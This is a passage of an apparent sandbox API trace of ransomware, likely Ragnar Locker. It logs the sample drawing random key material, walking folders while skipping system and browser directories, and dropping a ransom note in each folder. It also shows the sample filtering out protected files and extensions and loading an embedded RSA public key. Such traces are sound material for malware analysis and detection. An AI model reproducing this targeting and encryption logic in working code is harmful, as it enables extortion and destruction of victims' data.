CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35562a8) returned 1 [0172.325] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0172.325] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.325] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.327] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35562a8) returned 1 [0172.327] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.327] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.328] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.330] CryptEncrypt (in: hKey=0x3547d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.330] GetLastError () returned 0x80090016 [0172.331] CryptEncrypt (in: hKey=0x3547d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.331] GetLastError () returned 0x80090016 [0172.331] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x4fc) returned 0x3b4 [0172.340] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0172.442] GetProcessHeap () returned 0x3520000 [0172.442] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586920 | out: hHeap=0x3520000) returned 1 [0172.442] CloseHandle (hObject=0x3f0) returned 1 [0172.442] GetProcessHeap () returned 0x3520000 [0172.442] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0172.444] CloseHandle (hObject=0x3b4) returned 1 [0172.444] GetProcessHeap () returned 0x3520000 [0172.444] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0172.446] FindClose (in: hFindFile=0x3548140 | out: hFindFile=0x3548140) returned 1 [0172.447] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0172.448] lstrcmpiW (lpString1="1035", lpString2=".") returned 1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="..") returned 1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Windows") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Windows.old") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Tor browser") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Internet Explorer") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Google") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Opera") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Opera Software") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Mozilla") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="Mozilla Firefox") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="$Recycle.Bin") returned 1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="ProgramData") returned -1 [0172.448] lstrcmpiW (lpString1="1035", lpString2="All Users") returned -1 [0172.448] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0172.448] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1035" | out: lpString1="1035") returned="1035" [0172.448] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\" [0172.448] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1035\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\" [0172.448] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\!$R4GN4R_B8CF767A$!.txt" [0172.449] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1035\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0172.455] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*" [0172.455] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.455] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.456] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.456] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c40 [0172.456] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0172.456] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf421d7b2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.461] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0172.461] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0172.461] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf42189c8, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf42189c8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.461] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0172.461] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0172.461] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.461] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0172.462] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0172.462] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.462] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0172.462] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0172.462] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.462] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0172.462] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0172.462] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.462] FindClose (in: hFindFile=0x3547c40 | out: hFindFile=0x3547c40) returned 1 [0172.464] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0172.464] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf421d7b2, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf421d7b2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.466] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf42189c8, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf42189c8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.466] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.466] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0172.466] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0172.466] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0172.466] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.466] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.466] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0172.466] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned=".rtf" [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0172.466] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0172.467] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0172.467] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0172.467] GetProcessHeap () returned 0x3520000 [0172.467] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0172.469] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" [0172.469] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.469] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.469] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0172.469] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned=".xml" [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0172.469] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0172.470] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0172.470] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0172.470] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0172.470] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0172.470] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0172.470] GetProcessHeap () returned 0x3520000 [0172.470] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0172.472] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0172.472] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.472] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1035\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.472] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0172.472] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned=".dll" [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0172.472] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0172.473] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0172.473] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0172.473] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0172.473] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0172.473] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0172.473] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0172.473] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.473] GetProcessHeap () returned 0x3520000 [0172.473] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x35868f0 [0172.473] CryptAcquireContextW (in: phProv=0x35868f0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x35868f0*=0x3556880) returned 1 [0172.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0172.474] GetProcessHeap () returned 0x3520000 [0172.475] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35cd8e0 [0172.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35cd8e0, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0172.475] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.475] GetProcessHeap () returned 0x3520000 [0172.475] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc70 [0172.475] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc70, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc70, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.475] GetProcessHeap () returned 